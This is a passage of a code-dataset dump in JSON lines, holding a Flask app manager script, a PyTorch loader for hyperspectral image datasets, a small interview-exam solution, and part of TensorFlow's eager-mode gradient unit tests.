celery, serializer_helper, sentry, redis_store,\n sms, url_shortener, limiter, jwt, razor]\nbps = [bp]\n\napp = create_app(__name__, config, extensions=extensions, blueprints=bps)\napp.wsgi_app = ProxyFix(app.wsgi_app, num_proxies=2)\nmanager = Manager(app)\nmigrate = Migrate(app, db)\nmanager.add_command('db', MigrateCommand)\n\n\n@manager.shell\ndef _shell_context():\n return dict(\n app=app,\n db=db,\n ma=ma,\n config=config\n )\n\n\n@manager.command\ndef list_routes():\n output = []\n for rule in app.url_map.iter_rules():\n options = {}\n for arg in rule.arguments:\n options[arg] = \"[{0}]\".format(arg)\n methods = ','.join(rule.methods)\n url = url_for(rule.endpoint, **options)\n line = up.unquote(\"{:50s} {:20s} {}\".format(rule.endpoint, methods, url))\n output.append(line)\n\n for line in sorted(output):\n print(line)\n\n\n@manager.option('-A', '--application', dest='application', default='', required=True)\n@manager.option('-n', '--name', dest='name')\n@manager.option('-l', '--debug', dest='debug')\n@manager.option('-f', '--logfile', dest='logfile')\n@manager.option('-P', '--pool', dest='pool')\n@manager.option('-Q', '--queue', dest='queue')\n@manager.option('-c', '--concurrency', dest='concurrency', default=2)\ndef worker(application, concurrency, pool, debug, logfile, name, queue):\n celery.start()\n\n\n@app.route('/api/v1/health', methods=['GET'])\ndef status():\n return make_response(jsonify({'success': True, \"message\": 'Success', 'count': 0}), 200)\n\n\n@limiter.exempt\n@app.route('/api/v1/ping', methods=['GET'])\ndef ping():\n # from time import sleep\n # import random\n # sleep(random.randint(2, 4))\n return make_response(jsonify({'success': True, \"message\": 'Success'}), 200)\n\n\nif __name__ == \"__main__\":\n 
manager.run()\n","repo_name":"saurabh1e/boiler-plate","sub_path":"API/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"72584909209","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis file contains the PyTorch dataset for hyperspectral images and\r\nrelated helpers.\r\n\"\"\"\r\nimport spectral\r\nimport numpy as np\r\nimport torch\r\nimport torch.utils\r\nimport torch.utils.data\r\nimport os\r\nimport cv2\r\nfrom tqdm import tqdm\r\nimport h5py\r\n\r\ntry:\r\n # Python 3\r\n from urllib.request import urlretrieve\r\nexcept ImportError:\r\n # Python 2\r\n from urllib import urlretrieve\r\n\r\nfrom utils import open_file\r\n\r\nDATASETS_CONFIG = {\r\n 'PaviaC': {\r\n 'urls': ['http://www.ehu.eus/ccwintco/uploads/e/e3/Pavia.mat',\r\n 'http://www.ehu.eus/ccwintco/uploads/5/53/Pavia_gt.mat'],\r\n 'img': 'Pavia.mat',\r\n 'gt': 'Pavia_gt.mat'\r\n },\r\n 'PaviaU': {\r\n 'urls': ['http://www.ehu.eus/ccwintco/uploads/e/ee/PaviaU.mat',\r\n 'http://www.ehu.eus/ccwintco/uploads/5/50/PaviaU_gt.mat'],\r\n 'img': 'PaviaU.mat',\r\n 'gt': 'PaviaU_gt.mat'\r\n },\r\n 'KSC': {\r\n 'urls': ['http://www.ehu.es/ccwintco/uploads/2/26/KSC.mat',\r\n 'http://www.ehu.es/ccwintco/uploads/a/a6/KSC_gt.mat'],\r\n 'img': 'KSC.mat',\r\n 'gt': 'KSC_gt.mat'\r\n },\r\n 'IndianPines': {\r\n 'urls': ['http://www.ehu.eus/ccwintco/uploads/6/67/Indian_pines_corrected.mat',\r\n 'http://www.ehu.eus/ccwintco/uploads/c/c4/Indian_pines_gt.mat'],\r\n 'img': 'Indian_pines_corrected.mat',\r\n 'gt': 'Indian_pines_gt.mat'\r\n },\r\n 'Botswana': {\r\n 'urls': ['http://www.ehu.es/ccwintco/uploads/7/72/Botswana.mat',\r\n 'http://www.ehu.es/ccwintco/uploads/5/58/Botswana_gt.mat'],\r\n 'img': 'Botswana.mat',\r\n 'gt': 'Botswana_gt.mat',\r\n },\r\n 'Salinas':{\r\n 'img': 'Salinas.mat',\r\n 'gt': 'Salinas_gt.mat',\r\n }\r\n}\r\n\r\ntry:\r\n from custom_datasets import CUSTOM_DATASETS_CONFIG\r\n\r\n DATASETS_CONFIG.update(CUSTOM_DATASETS_CONFIG)\r\nexcept ImportError:\r\n pass\r\n\r\n\r\nclass TqdmUpTo(tqdm):\r\n \"\"\"Provides `update_to(n)` which uses `tqdm.update(delta_n)`.\"\"\"\r\n\r\n def update_to(self, b=1, bsize=1, tsize=None):\r\n \"\"\"\r\n b : int, optional\r\n Number of blocks transferred so far [default: 1].\r\n bsize : int, optional\r\n Size of each block (in tqdm units) [default: 1].\r\n tsize : int, optional\r\n Total size (in tqdm units). 
If [default: None] remains unchanged.\r\n \"\"\"\r\n if tsize is not None:\r\n self.total = tsize\r\n self.update(b * bsize - self.n) # will also set self.n = b * bsize\r\n\r\n\r\ndef get_dataset(dataset_name, target_folder=\"./\", datasets=DATASETS_CONFIG, patch_size=5):\r\n \"\"\" Gets the dataset specified by name and return the related components.\r\n Args:\r\n dataset_name: string with the name of the dataset\r\n target_folder (optional): folder to store the datasets, defaults to ./\r\n datasets (optional): dataset configuration dictionary, defaults to prebuilt one\r\n Returns:\r\n img: 3D hyperspectral image (WxHxB)\r\n gt: 2D int array of labels\r\n label_values: list of class names\r\n ignored_labels: list of int classes to ignore\r\n rgb_bands: int tuple that correspond to red, green and blue bands\r\n \"\"\"\r\n palette = None\r\n\r\n if dataset_name not in datasets.keys():\r\n raise ValueError(\"{} dataset is unknown.\".format(dataset_name))\r\n\r\n dataset = datasets[dataset_name]\r\n\r\n folder = target_folder + datasets[dataset_name].get('folder', dataset_name + '/') # get()函数返回指定键的值,如果指定键的值不存在时,返回该默认值值。\r\n if dataset.get('download', False): # 我将True改成了False ,默认不下载\r\n # Download the dataset if is not present\r\n if not os.path.isdir(folder): # 用于判断对象是否为一个目录\r\n os.mkdir(folder)\r\n for url in datasets[dataset_name]['urls']:\r\n # download the files\r\n filename = url.split('/')[-1]\r\n if not os.path.exists(folder + filename):\r\n with TqdmUpTo(unit='B', unit_scale=True, miniters=1,\r\n desc=\"Downloading {}\".format(filename)) as t:\r\n urlretrieve(url, filename=folder + filename, # 利用urlretrieve()将数据下载到本地。\r\n reporthook=t.update_to)\r\n elif not os.path.isdir(folder):\r\n print(\"WARNING: {} is not downloadable.\".format(dataset_name))\r\n\r\n if dataset_name == 'PaviaC':\r\n # Load the image\r\n img = open_file(folder + 'Pavia.mat')['pavia']\r\n\r\n rgb_bands = (55, 41, 12)\r\n\r\n gt = open_file(folder + 'Pavia_gt.mat')['pavia_gt']\r\n\r\n label_values = [\"Undefined\", \"Water\", \"Trees\", \"Asphalt\",\r\n \"Self-Blocking Bricks\", \"Bitumen\", \"Tiles\", \"Shadows\",\r\n \"Meadows\", \"Bare Soil\"]\r\n\r\n ignored_labels = [0]\r\n\r\n elif dataset_name == 'PaviaU':\r\n # Load the image\r\n img = open_file(folder + 'PaviaU.mat')['paviaU']\r\n # img = open_file(folder + 'paviaU_PCA_30.mat')['q'] # PCA\r\n # feature = h5py.File(folder + 'paviaU_PCA_30.mat')\r\n # img = feature['q']\r\n\r\n rgb_bands = (55, 41, 12)\r\n\r\n gt = open_file(folder + 'PaviaU_gt.mat')['paviaU_gt']\r\n\r\n label_values = [\"Undefined\", 'Asphalt', 'Meadows', 'Gravel', 'Trees',\r\n 'Painted metal sheets', 'Bare Soil', 'Bitumen',\r\n 'Self-Blocking Bricks', 'Shadows']\r\n\r\n ignored_labels = [0]\r\n\r\n elif dataset_name == 'IndianPines':\r\n # Load the image\r\n img = open_file(folder + 'Indian_pines_corrected.mat')\r\n img = img['indian_pines_corrected']\r\n\r\n # img = open_file(folder + 'indian_pines_80.mat') # 80层引导滤波\r\n # img = img['q']\r\n\r\n # img = open_file(folder + 'indian_pines_PCA_30.mat') # PCA\r\n # img = img['q'] # PCA\r\n\r\n rgb_bands = (43, 21, 11) # AVIRIS sensor\r\n\r\n gt = open_file(folder + 'Indian_pines_gt.mat')['indian_pines_gt']\r\n label_values = [\"Undefined\", \"Alfalfa\", \"Corn-notill\", \"Corn-mintill\",\r\n \"Corn\", \"Grass-pasture\", \"Grass-trees\",\r\n \"Grass-pasture-mowed\", \"Hay-windrowed\", \"Oats\",\r\n \"Soybean-notill\", \"Soybean-mintill\", \"Soybean-clean\",\r\n \"Wheat\", \"Woods\", \"Buildings-Grass-Trees-Drives\",\r\n 
\"Stone-Steel-Towers\"]\r\n\r\n ignored_labels = [0]\r\n\r\n elif dataset_name == 'Botswana':\r\n # Load the image\r\n img = open_file(folder + 'Botswana.mat')['Botswana']\r\n\r\n rgb_bands = (75, 33, 15)\r\n\r\n gt = open_file(folder + 'Botswana_gt.mat')['Botswana_gt']\r\n label_values = [\"Undefined\", \"Water\", \"Hippo grass\",\r\n \"Floodplain grasses 1\", \"Floodplain grasses 2\",\r\n \"Reeds\", \"Riparian\", \"Firescar\", \"Island interior\",\r\n \"Acacia woodlands\", \"Acacia shrublands\",\r\n \"Acacia grasslands\", \"Short mopane\", \"Mixed mopane\",\r\n \"Exposed soils\"]\r\n\r\n ignored_labels = [0]\r\n\r\n elif dataset_name == 'KSC':\r\n # Load the image\r\n img = open_file(folder + 'KSC.mat')['KSC']\r\n\r\n rgb_bands = (43, 21, 11) # AVIRIS sensor\r\n\r\n gt = open_file(folder + 'KSC_gt.mat')['KSC_gt']\r\n label_values = [\"Undefined\", \"Scrub\", \"Willow swamp\",\r\n \"Cabbage palm hammock\", \"Cabbage palm/oak hammock\",\r\n \"Slash pine\", \"Oak/broadleaf hammock\",\r\n \"Hardwood swamp\", \"Graminoid marsh\", \"Spartina marsh\",\r\n \"Cattail marsh\", \"Salt marsh\", \"Mud flats\", \"Wate\"]\r\n\r\n ignored_labels = [0]\r\n\r\n elif dataset_name == 'Salinas':\r\n # Load the image\r\n img = open_file(folder + 'Salinas.mat')\r\n img = img['salinas_corrected']\r\n # img = open_file(folder + 'Salinas_PCA_30.mat')\r\n # img = img['q']\r\n\r\n rgb_bands = (55, 41, 12)\r\n\r\n gt = open_file(folder + 'Salinas_gt.mat')['salinas_gt']\r\n\r\n label_values = [\"Undefined\", \"Brocoli_green_weeds_1\", \"Brocoli_green_weeds_2\", \"Fallow\",\r\n \"Fallow_rough_plow\", \"Fallow_smooth\", \"Stubble\", \"Celery\",\r\n \"Grapes_untrained\", \"Soil_vinyard_develop\", \"Corn_senesced_green_weeds\", \"Lettuce_romaine_4wk\",\r\n \"Lettuce_romaine_5wk\", \"Lettuce_romaine_6wk\", \"Lettuce_romaine_7wk\",\r\n \"Vinyard_untrained\", \"Vinyard_vertical_trellis\"]\r\n\r\n ignored_labels = [0]\r\n\r\n else:\r\n # Custom dataset # 自定义数据\r\n img, gt, rgb_bands, ignored_labels, label_values, palette = CUSTOM_DATASETS_CONFIG[dataset_name]['loader'](\r\n folder)\r\n\r\n # Filter NaN out 检查数据中是否还有NaN数据\r\n nan_mask = np.isnan(img.sum(axis=-1)) # np.isnan() 返回的是一个数组,其中的值是对应输入数组对元素NaN判断的bool型数据\r\n if np.count_nonzero(nan_mask) > 0: # 意义为:数据中有NaN存在\r\n print(\r\n \"Warning: NaN have been found in the data. It is preferable to remove them beforehand. 
Learning on NaN data is disabled.\")\r\n img[nan_mask] = 0 # 将NaN型数据转成0\r\n gt[nan_mask] = 0\r\n ignored_labels.append(0)\r\n\r\n ori_img = img # 记录原始的img 和 gt\r\n ori_gt = gt\r\n # 将img镜像扩展patch size个像素,为了在最后输出的时候能够输出100%比例的分类图***\r\n img = cv2.copyMakeBorder(img, patch_size // 2, patch_size // 2, patch_size // 2, patch_size // 2,\r\n cv2.BORDER_REFLECT)\r\n gt = cv2.copyMakeBorder(gt, patch_size // 2, patch_size // 2, patch_size // 2, patch_size // 2, cv2.BORDER_REFLECT)\r\n\r\n ignored_labels = list(set(ignored_labels)) # set(list_a) 将list_a中的出现过的数据做成一个集合 如list = [1, 1, 3, 2, 3] --> {1, 2, 3}\r\n # Normalization\r\n img = np.asarray(img, dtype='float32')\r\n img = (img - np.min(img)) / (np.max(img) - np.min(img)) # 数据归一化\r\n # ori_img = np.asarray(ori_img, dtype='float32')\r\n # ori_img = (ori_img - np.min(ori_img)) / (np.max(ori_img) - np.min(ori_img)) # 数据归一化\r\n\r\n return img, gt, label_values, ignored_labels, rgb_bands, palette #, ori_img, ori_gt\r\n\r\n\r\nclass HyperX(torch.utils.data.Dataset):\r\n \"\"\" Generic class for a hyperspectral scene \"\"\"\r\n\r\n def __init__(self, data, gt, **hyperparams):\r\n \"\"\"\r\n Args:\r\n data: 3D hyperspectral image\r\n gt: 2D array of labels\r\n patch_size: int, size of the spatial neighbourhood\r\n center_pixel: bool, set to True to consider only the label of the\r\n center pixel\r\n data_augmentation: bool, set to True to perform random flips\r\n supervision: 'full' or 'semi' supervised algorithms\r\n \"\"\"\r\n super(HyperX, self).__init__()\r\n self.data = data\r\n self.label = gt\r\n self.name = hyperparams['dataset']\r\n self.patch_size = hyperparams['patch_size']\r\n self.ignored_labels = set(hyperparams['ignored_labels'])\r\n self.flip_augmentation = hyperparams['flip_augmentation']\r\n self.radiation_augmentation = hyperparams['radiation_augmentation']\r\n self.mixture_augmentation = hyperparams['mixture_augmentation']\r\n self.center_pixel = hyperparams['center_pixel']\r\n self.train_sample_extend = hyperparams['train_sample_extend'] # 样本扩展参数\r\n supervision = hyperparams['supervision']\r\n # Fully supervised : use all pixels with label not ignored\r\n if supervision == 'full':\r\n mask = np.ones_like(gt)\r\n for l in self.ignored_labels:\r\n mask[gt == l] = 0\r\n # Semi-supervised : use all pixels, except padding\r\n elif supervision == 'semi':\r\n mask = np.ones_like(gt) # 返回一个和gt一样大小的全1矩阵\r\n\r\n x_pos, y_pos = np.nonzero(mask) # 返回mask中非零值得索引值 即pix在图中的坐标\r\n p = self.patch_size // 2 # // 是向下取整的除法\r\n # z = []\r\n # sizes = x_pos.size\r\n # for i in range(1, sizes):\r\n # z.append(i)\r\n\r\n temp_indices = np.array([(x, y) for x, y in zip(x_pos, y_pos) if # pix的坐标位置\r\n x > p and x < data.shape[0] - p and y > p and y < data.shape[1] - p])\r\n\r\n\r\n self.indices = []\r\n for item_x, item_y in temp_indices:\r\n newitem= [item_x, item_y, 0]\r\n self.indices.append(newitem)\r\n newitem = [item_x, item_y, 1]\r\n self.indices.append(newitem)\r\n newitem = [item_x, item_y, 2]\r\n self.indices.append(newitem)\r\n\r\n # if self.train_sample_extend is True:\r\n # #self.indices = []\r\n # self.labels = []\r\n # for j in range(1, 4):\r\n # z = np.ones_like(x_pos)*j\r\n # indices_ = np.array([(x, y, z) for x, y, z in zip(x_pos, y_pos, z) if # pix的坐标位置 以及 是否进行\r\n # x > p and x < data.shape[0] - p and y > p and y < data.shape[1] - p]) # 对x,y坐标的限制\r\n # self.indices.append(indices_)\r\n\r\n self.labels = [self.label[x, y] for x, y, z in self.indices]\r\n # self.labels.append(labels)\r\n # self.labels = [self.label[x, y] for x, y in 
self.indices]\r\n np.random.shuffle(self.indices)\r\n\r\n # if self.train_sample_extend is True:\r\n # z = 1\r\n # self.indices_updown = np.array([(x, y, z) for x, y in zip(x_pos, y_pos, z) if # pix的坐标位置\r\n # x > p and x < data.shape[0] - p and y > p and y < data.shape[1] - p]) # 对x,y坐标的限制\r\n # self.labels_updown = [self.label[x, y] for x, y in self.indices_updown]\r\n # z = 2\r\n # self.indices_rl = np.array([(x, y, z) for x, y in zip(x_pos, y_pos, z) if # pix的坐标位置\r\n # x > p and x < data.shape[0] - p and y > p and y < data.shape[1] - p]) # 对x,y坐标的限制\r\n # self.labels_rl = [self.label[x, y] for x, y in self.indices_rl]\r\n # np.random.shuffle(self.indices_updown)\r\n # np.random.shuffle(self.indices_rl)\r\n\r\n @staticmethod\r\n def flip(*arrays, z): # 数据增强 之 翻转\r\n # horizontal = np.random.random() > 0.5 # 50% 几率\r\n # vertical = np.random.random() > 0.5\r\n if z is 1:\r\n arrays = [np.fliplr(arr) for arr in arrays] # 将数组在左右翻转\r\n if z is 2:\r\n arrays = [np.flipud(arr) for arr in arrays] # 上下翻转\r\n return arrays\r\n\r\n @staticmethod\r\n def radiation_noise(data, alpha_range=(0.9, 1.1), beta=1 / 25):\r\n alpha = np.random.uniform(*alpha_range)\r\n noise = np.random.normal(loc=0., scale=1.0, size=data.shape)\r\n return alpha * data + beta * noise\r\n\r\n def mixture_noise(self, data, label, beta=1 / 25):\r\n alpha1, alpha2 = np.random.uniform(0.01, 1., size=2)\r\n noise = np.random.normal(loc=0., scale=1.0, size=data.shape)\r\n data2 = np.zeros_like(data)\r\n for idx, value in np.ndenumerate(label):\r\n if value not in self.ignored_labels:\r\n l_indices = np.nonzero(self.labels == value)[0]\r\n l_indice = np.random.choice(l_indices)\r\n assert (self.labels[l_indice] == value)\r\n x, y = self.indices[l_indice]\r\n data2[idx] = self.data[x, y]\r\n return (alpha1 * data + alpha2 * data2) / (alpha1 + alpha2) + beta * noise\r\n\r\n def __len__(self):\r\n return len(self.indices)\r\n\r\n def __getitem__(self, i):\r\n x, y, z = self.indices[i] # 先获取坐标\r\n x1, y1 = x - self.patch_size // 2, y - self.patch_size // 2 # 计算出目标window\r\n x2, y2 = x1 + self.patch_size, y1 + self.patch_size\r\n\r\n data = self.data[x1:x2, y1:y2] # 读取window中的数据和类别\r\n label = self.label[x1:x2, y1:y2]\r\n\r\n if z // 3 is 1:\r\n data, label = self.flip(data, label, z=1) # 左右翻转\r\n if z // 3 is 2:\r\n data, label = self.flip(data, label, z=2) # 上下翻转\r\n # if self.flip_augmentation and self.patch_size > 1: # 数据增强 之 翻转\r\n # # Perform data augmentation (only on 2D patches)\r\n # data, label = self.flip(data, label)\r\n if self.radiation_augmentation and np.random.random() < 0.1: # 10%的概率加噪声\r\n data = self.radiation_noise(data)\r\n if self.mixture_augmentation and np.random.random() < 0.2: # 20%的概率加mixture噪声\r\n data = self.mixture_noise(data, label)\r\n\r\n # ***Copy the data into numpy arrays (PyTorch doesn't like numpy views)***\r\n data = np.asarray(np.copy(data).transpose((2, 0, 1)), dtype='float32')\r\n label = np.asarray(np.copy(label), dtype='int64')\r\n\r\n # ***Load the data into PyTorch tensors***\r\n data = torch.from_numpy(data)\r\n label = torch.from_numpy(label)\r\n # Extract the center label if needed\r\n if self.center_pixel and self.patch_size > 1:\r\n label = label[self.patch_size // 2, self.patch_size // 2] # 确定window中心点pix的label\r\n # Remove unused dimensions when we work with invidual spectrums\r\n elif self.patch_size == 1:\r\n data = data[:, 0, 0]\r\n label = label[0, 0]\r\n\r\n # Add a fourth dimension for 3D CNN\r\n #if self.patch_size > 1:\r\n # Make 4D data ((Batch x) Planes x Channels x Width 
x Height)\r\n # data = data.unsqueeze(0) # 在第(0)个维度的位置加一个维度\r\n return data, label\r\n","repo_name":"JarvenYi/CBW","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":18224,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"13277676582","text":"#coding=utf-8\nimport sys\n\nif __name__ == \"__main__\":\n # 读取第一行的n\n n = int(sys.stdin.readline().strip())\n ans = 0\n dayGrowth = []\n for i in range(n):\n # 读取每一行\n line = sys.stdin.readline().strip()\n # 把每一行的数字分隔后转化成int列表\n values = map(int, line.split())\n values = [i for i in values]\n if values[0] == 1: # from to\n # form a day growth rule\n if values[2] > len(dayGrowth):\n newDayGrowth = [float('-inf') for _ in range(values[2])]\n for i in range(len(dayGrowth)):\n newDayGrowth[i] = dayGrowth[i]\n for j in range(values[1] - 1, values[2]):\n if newDayGrowth[j] < values[3]:\n newDayGrowth[j] = values[3]\n dayGrowth = newDayGrowth\n if values[0] == 2: # activity\n ans += values[2]\n for i in range(len(dayGrowth)):\n if dayGrowth[i] == float('-inf'):\n dayGrowth[i] = 0\n ans += sum(dayGrowth)\n print(ans)","repo_name":"SuperMartinYang/learning_algorithm","sub_path":"interview_exam/souhu/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21159796139","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\nfrom tensorflow.python import pywrap_tensorflow\nfrom tensorflow.python.eager import backprop\nfrom tensorflow.python.eager import context\nfrom tensorflow.python.eager import custom_gradient\nfrom tensorflow.python.eager import imperative_grad\nfrom tensorflow.python.eager import tape\nfrom tensorflow.python.eager import test\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import tensor_shape\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import embedding_ops\nfrom tensorflow.python.ops import gradients\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import nn_grad # pylint: disable=unused-import\nfrom tensorflow.python.ops import nn_ops\nfrom tensorflow.python.ops import random_ops\nfrom tensorflow.python.ops import resource_variable_ops\nfrom tensorflow.python.ops import variables\nfrom tensorflow.python.training import training\nfrom tensorflow.python.util import compat\n\n\nclass BackpropTest(test.TestCase):\n\n def testAggregateGradients(self):\n\n def fn(x):\n ind1 = constant_op.constant(np.array([0, 1]))\n ind2 = constant_op.constant(np.array([2, 3]))\n ind3 = constant_op.constant(np.array([1, 3]))\n # A mixture of IndexedSlices and dense tensor to aggregate.\n g1 = embedding_ops.embedding_lookup(x, ind1)\n g2 = embedding_ops.embedding_lookup(x, ind2)\n g3 = embedding_ops.embedding_lookup(x, ind3)\n g4 = math_ops.reduce_sum(x * constant_op.constant(2.0))\n return g1 * g2 * g3 * g4\n\n var_np = np.random.rand(4, 2).astype(np.float32)\n var = constant_op.constant(var_np)\n grad = backprop.gradients_function(fn, [0])(var)[0]\n grad = ops.convert_to_tensor(grad).numpy()\n\n with context.graph_mode(), self.test_session():\n tf_var = array_ops.constant(var_np, dtypes.float32)\n tf_ind1 = array_ops.constant([0, 1])\n tf_ind2 = array_ops.constant([2, 3])\n 
tf_ind3 = array_ops.constant([1, 3])\n tf_g1 = embedding_ops.embedding_lookup(tf_var, tf_ind1)\n tf_g2 = embedding_ops.embedding_lookup(tf_var, tf_ind2)\n tf_g3 = embedding_ops.embedding_lookup(tf_var, tf_ind3)\n tf_g4 = math_ops.reduce_sum(tf_var * 2.0, reduction_indices=(0, 1))\n tf_y = tf_g1 * tf_g2 * tf_g3 * tf_g4\n tf_grad = gradients.gradients(tf_y, [tf_var])[0]\n\n tf_dense_grad = math_ops.unsorted_segment_sum(\n tf_grad.values, tf_grad.indices, tf_grad.dense_shape[0])\n\n self.assertAllClose(grad, tf_dense_grad.eval())\n\n def testImplicitGradWithResourceVariable(self):\n x = resource_variable_ops.ResourceVariable(\n initial_value=constant_op.constant(1.0), name='x')\n\n def fn():\n tape.watch_variable(x)\n b = constant_op.constant(2.0)\n c = math_ops.add(x.value(), b)\n return math_ops.add(c, constant_op.constant(3.0))\n\n grads_and_vars = backprop.implicit_grad(fn)()\n self.assertAllEqual(grads_and_vars[0][0], 1.0)\n self.assertAllEqual(id(grads_and_vars[0][1]), id(x))\n\n def testDy(self):\n\n def f(x):\n return x\n\n grad_fn = backprop.gradients_function(f)\n self.assertAllEqual(2., grad_fn(1., dy=2.)[0])\n\n def testImplicitGradOverEmbeddingLookup(self):\n batch_size = 8\n embedding_size = 512\n vocab_size = 1000\n lrn_rate = 0.1\n random_init = random_ops.random_uniform([vocab_size, embedding_size])\n\n x = array_ops.ones((batch_size), dtypes.int64)\n embedding = resource_variable_ops.ResourceVariable(\n initial_value=random_init, dtype=dtypes.float32, name='embedding')\n\n def f():\n tape.watch_variable(embedding)\n embedded_x = embedding_ops.embedding_lookup(embedding, x)\n return constant_op.constant(1.0, dtypes.float32) - embedded_x\n\n grad = backprop.implicit_grad(f)()[0][0]\n opt = training.GradientDescentOptimizer(lrn_rate)\n\n with context.graph_mode(), self.test_session():\n tf_x = array_ops.ones((batch_size), dtypes.int64)\n # TODO(ashankar,apassos): Change to ResourceVariable.\n tf_embedding = variables.Variable(\n random_init.numpy(), name='tf_embedding')\n tf_embedded_x = embedding_ops.embedding_lookup(tf_embedding, tf_x)\n tf_y = 1.0 - tf_embedded_x\n tf_grad = gradients.gradients(tf_y, [tf_embedding])[0]\n tf_opt = training.GradientDescentOptimizer(0.1)\n tf_embedding.initializer.run()\n\n self.assertAllClose(tf_grad.indices.eval(), grad.indices)\n self.assertAllClose(tf_grad.values.eval(), grad.values)\n\n tf_opt.apply_gradients([(tf_grad, tf_embedding)]).run()\n expected = tf_embedding.eval()\n opt.apply_gradients([(grad, embedding)])\n self.assertAllClose(expected, embedding.read_value())\n\n def testGradientNone(self):\n\n def loss(x, l):\n return math_ops.reduce_mean(\n nn_ops.softmax_cross_entropy_with_logits(logits=x, labels=l),\n constant_op.constant([0]))\n\n logits = constant_op.constant([[0.0, 0.0]])\n labels = constant_op.constant([[1.0, 0.0]])\n # softmax_cross_entropy_with_logits returns two outputs and in this case the\n # gradient wrt the second is None.\n g, = backprop.gradients_function(loss, [0])(logits, labels)\n self.assertAllEqual(g.numpy(), [[-0.5, 0.5]])\n\n def testSecondGrad(self):\n\n def first(x):\n l = constant_op.constant([[0.0]])\n x = nn_ops.softmax_cross_entropy_with_logits(labels=l, logits=x)\n x = math_ops.reduce_sum(x, constant_op.constant([0]))\n return x\n\n def second(x):\n grad = backprop.gradients_function(first, [0])(x)[0]\n return math_ops.reduce_sum(grad, constant_op.constant([0]))\n\n f = constant_op.constant([[0.1]])\n grad = backprop.gradients_function(second, [0])(f)[0]\n self.assertAllEqual([[0.0]], grad)\n\n 
def testMakeVJP(self):\n\n def f(x):\n return x * x\n\n wrapped_fn = backprop.make_vjp(f)\n result, vjp = wrapped_fn(constant_op.constant(3.0))\n self.assertAllEqual(result, 9.0)\n self.assertAllEqual(vjp(2.0)[0], 12.0)\n\n def testGradGrad(self):\n\n def sq(x):\n return x * x\n\n def grad(x):\n value = backprop.gradients_function(sq, [0])(x)[0]\n return value\n\n gradgrad = backprop.gradients_function(grad, [0])\n\n self.assertAllEqual(gradgrad(constant_op.constant(3.0))[0], 2.0)\n\n def testGradGradExp(self):\n\n def grad(x):\n value = backprop.gradients_function(math_ops.exp, [0])(x)[0]\n return value\n\n gradgrad = backprop.gradients_function(grad, [0])\n\n self.assertAllEqual(gradgrad(constant_op.constant(0.0))[0], 1.0)\n\n def testGPU(self):\n if not context.context().num_gpus():\n self.skipTest('No GPUs found')\n\n def fn(x):\n with context.device('/gpu:0'):\n b = constant_op.constant(2.0)\n c = math_ops.add(x.gpu(), b)\n # TODO(apassos): remove cpu below by making TensorVSPace aware\n # of devices.\n return math_ops.add(c, constant_op.constant(3.0)).cpu()\n\n grad = backprop.gradients_function(fn, [0])(constant_op.constant(1.0))[0]\n self.assertAllEqual(grad, 1.0)\n\n def testGPUImplicitGrad(self):\n if not context.context().num_gpus():\n self.skipTest('No GPU found')\n with context.device('gpu:0'):\n v = resource_variable_ops.ResourceVariable(\n constant_op.constant(1.0), name='v')\n\n def f():\n with context.device('gpu:0'):\n tape.watch_variable(v)\n return v.read_value()\n\n self.assertEqual(\n backprop.implicit_grad(f)()[0][0].cpu().numpy(), 1.0)\n\n def testCPU(self):\n\n def fn(x):\n b = constant_op.constant(2.0)\n c = math_ops.add(x, b)\n return math_ops.add(c, constant_op.constant(3.0))\n\n grad = backprop.gradients_function(fn, [0])(constant_op.constant(1.0))[0]\n self.assertAllEqual(grad, 1.0)\n\n def testTensorCopyGPU2CPU2GPU(self):\n if not context.context().num_gpus():\n self.skipTest('No GPUs found')\n\n def f(a, b):\n return a.cpu() + b.cpu()\n\n with context.device('/gpu:0'):\n a = constant_op.constant(1.0)\n b = constant_op.constant(2.0)\n\n grad = backprop.gradients_function(f, [0])(a, b)[0]\n self.assertAllEqual(grad, 1.0)\n\n def testEmptyParams(self):\n\n def fn(a, b):\n return a * b\n\n x = constant_op.constant(1.0)\n y = constant_op.constant(2.0)\n dx, dy = backprop.gradients_function(fn)(x, y)\n self.assertAllEqual(dx, y.numpy())\n self.assertAllEqual(dy, x.numpy())\n\n def testUnconnectedNone(self):\n v = resource_variable_ops.ResourceVariable(\n 1.0, name='testUnconnectedNone')\n\n def f():\n v.read_value()\n return constant_op.constant(1.0)\n\n self.assertEqual(backprop.implicit_grad(f)()[0][0], None)\n\n def testGradientTape(self):\n with backprop.GradientTape() as g:\n x = constant_op.constant(3.0)\n g.watch(x)\n y = x * x\n with backprop.GradientTape() as gg:\n gg.watch(y)\n z = 2 * y\n inner_grad = gg.gradient(z, [y])[0]\n self.assertEqual(inner_grad.numpy(), 2.0)\n y += inner_grad\n grad = g.gradient(y, [x])[0]\n self.assertEqual(grad.numpy(), 6.0)\n\n def testGradientTapeVariable(self):\n v = resource_variable_ops.ResourceVariable(1.0, name='v')\n with backprop.GradientTape() as g:\n y = v * v\n grad = g.gradient(y, [v])[0]\n self.assertAllEqual(grad, 2.0)\n\n def testEmptyParamsForValueAndGradFunction(self):\n def fn(a, b):\n return a * b\n val_and_grads_fn = backprop.val_and_grad_function(fn)\n\n x = 2.0\n y = 3.0\n val, (dx, dy) = val_and_grads_fn(x, y)\n self.assertAllClose(val, x * y)\n self.assertAllEqual(dx, y)\n self.assertAllEqual(dy, 
